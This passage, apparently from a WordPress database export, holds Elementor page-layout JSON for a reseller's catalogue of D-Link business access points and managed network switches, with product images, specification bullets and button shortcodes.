client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fff65ca\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7487,3398,'_elementor_version','2.5.14'),(7488,3398,'_elementor_edit_mode','builder'),(7498,3400,'_wp_page_template','template-fullwidth.php'),(7491,3399,'_wp_page_template','template-fullwidth.php'),(7492,3399,'_elementor_template_type','post'),(7493,3399,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fff65ca\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-8\",\"right\":\"-8\",\"bottom\":\"-8\",\"left\":\"-8\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" 